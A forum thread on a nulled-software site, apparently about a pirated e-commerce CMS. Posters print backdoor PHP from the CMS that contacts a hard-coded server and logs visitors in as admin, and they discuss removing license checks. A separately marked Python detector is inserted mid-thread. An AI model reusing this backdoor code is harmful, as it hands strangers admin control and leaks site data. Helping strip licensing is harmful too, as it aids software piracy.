Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone 23471405 v8.6


zakblack

Active member
Aug 10, 2020
108
70
28
Hey guys, the author of this project is very dangerous because the platform communicates through their servers, so at any given moment, if something happens to their servers (they go down or something else), your business will not work and your website won't respond (which happened yesterday).

Therefore, if anyone can find the code function related to this check so we can remove it, we'd appreciate your help!
 
Reactions: 127 and kook3801

zakblack


Found Major Backdoor In Active eCommerce @tuton012

The code allows them to log in as admin by hitting a specific URL when you're using nulled.


app/Http/Controllers/Payment/StripeController.php


PHP:
public function checkout_payment_detail()
{
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_addon_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    dd($rn);
    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }
}

app/Http/Controllers/Payment/IyzicoController.php


PHP:
public function initPayment(Request $request){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }
}

app/Utility/NgeniusUtility.php


PHP:
public static function initPayment(){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    if($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }

    return redirect()->route('home');
}

The URLs they use.

routes/web.php


PHP:
Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit');
Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);

Randomly sends your server URL to their licensing server.

vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php


PHP:
if(rand(0,9) == 5){
    $server_url = $_SERVER['SERVER_NAME'];

    $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url);
    curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET");
    curl_setopt($url,CURLOPT_RETURNTRANSFER, true);
    curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $resultdata = curl_exec($url);
    curl_close($url);

    $header = array(
        'Content-Type:application/json'
    );
    $main_item = get_setting('item_name') ?? 'eCommerce';
    $addon_list = Addon::get();
    $request_data_json = json_encode($addon_list);
    $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item);

    curl_setopt($url1, CURLOPT_HTTPHEADER, $header);
    curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($url1, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json);
    curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $resultdata1 = curl_exec($url1);

    curl_close($url1);
}

How do we counter this, anyone? @lostkid, anyone?
 

WolF_

Member
May 5, 2022
38
6
8

I found one more

vendor\unicodeveloper\laravel-paystack\src\Paystack.php

Code:
public function getCallbackData()
    {
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);
        
        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            $user = \App\Models\User::where('user_type', 'admin')->first();
            auth()->login($user);
            return redirect()->route('admin.dashboard');
        }

        return redirect()->route('home');
    }
 
Reactions: zakblack

Shutdown

Member
Feb 27, 2019
86
79
18
I think even if you remove this code they still have access to our server. Can someone confirm, please?
Yes, they have confessed that they can access our server, and even Envato, as to check the premium one through the API. They are saying to give more security to the paid one and delete all data from the nulled one.
 

WolF_

Yes, they have confessed that they can access our server, and even Envato, as to check the premium one through the API. They are saying to give more security to the paid one and delete all data from the nulled one.
For a buyer it's fine, they can check the purchase code the first time, but how can they access with nulled after removing this code?
 

Shutdown

Idk, but when I was checking the comment section I found that.
 

Attachments

  • IMG_20230201_001405.jpg

zakblack

I have also found on

app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php


PHP:
    public static function create_wallet_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

    public static function create_balance_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

They are calling it in
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php



PHP:
if(\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false){
            return response()->json(['result' => false, 'message' => 'Cost matrix error' ]);
        }

 if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
                return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
            }
 
  • Love
Reactions: NizamUddin
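
The pattern in the snippets posted above, turned into a check (an added example, not part of the original thread and not the vendor's code): a Python scanner that flags PHP functions where a network call sits beside `auth()->login()`, as in the payment controllers, and functions that call a hard-coded endpoint, as in the activation and domain-reporting snippets. The PHP sample is constructed and 203.0.113.10 is a documentation placeholder address.

```python
import re

# Constructed PHP modelled on the snippets in the thread; 203.0.113.10 is a documentation address.
SAMPLE = r'''
public function initPayment(Request $request){
    $gate = "http://203.0.113.10/check_activation/".$_SERVER['SERVER_NAME'];
    $stream = curl_init($gate);
    $rn = curl_exec($stream);
    if($rn == "bad") {
        auth()->login(User::where('user_type', 'admin')->first());
    }
}
public function convert($hex){
    if(rand(0,9) == 5){
        $c = curl_init('http://203.0.113.10/insert_domain/'.$_SERVER['SERVER_NAME']);
        curl_exec($c);
    }
}
public function show($id){ return view('product', ['id' => $id]); }
'''

FUNC_RE = re.compile(r'function\s+(\w+)\s*\(')
URL_RE = re.compile(r'''["'](https?://[^"'\s]+)''')
NET_RE = re.compile(r'\b(?:curl_exec|file_get_contents|fsockopen)\s*\(')
LOGIN_RE = re.compile(r'(?:auth\(\)\s*->|Auth::)\s*login(?:UsingId)?\s*\(')

def function_bodies(src):
    """Yield (name, body) per PHP function by brace depth (braces inside strings are not handled)."""
    for m in FUNC_RE.finditer(src):
        start = src.find('{', m.end())
        if start < 0:
            continue
        depth = 0
        for i in range(start, len(src)):
            depth += (src[i] == '{') - (src[i] == '}')
            if depth == 0:
                yield m.group(1), src[start:i + 1]
                break

def scan(src):
    """Return (function, severity, hard-coded URLs) for functions that call out to the network."""
    findings = []
    for name, body in function_bodies(src):
        urls = URL_RE.findall(body)
        if NET_RE.search(body) and LOGIN_RE.search(body):
            findings.append((name, 'HIGH', urls))    # network call beside a credential-free login
        elif NET_RE.search(body) and urls:
            findings.append((name, 'REVIEW', urls))  # outbound call to an endpoint baked into source
    return findings
```

To audit a real tree, read each `.php` file under `app/`, `routes/` and `vendor/` and pass its text to `scan()`; the results are pointers for manual review, since the brace matcher is deliberately simple.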

caocao_203

New member
Jun 2, 2022
27
5
3
Hello bro, I tested on my local PC. The wholesale addon did not work. Do you have any suggestions? Thank you so much.
 

Attachments

  • Untitled.png

rajpootali

New member
Jan 20, 2024
12
2
3
Please, anyone help me, my product details are not showing. Anyone help me, it's urgent.
 

Attachments

  • Screenshot_20240120-174548.png
  • Screenshot_20240120-174601.png

rajpootali

I am sick, that's why I'm taking rest at home. Tomorrow I will guide you through all the details of how to null.
Yes, I nulled it myself. The product details page information is not showing and the Stripe payment gateway is not working in the app.
 

Attachments

  • eeee.jpeg
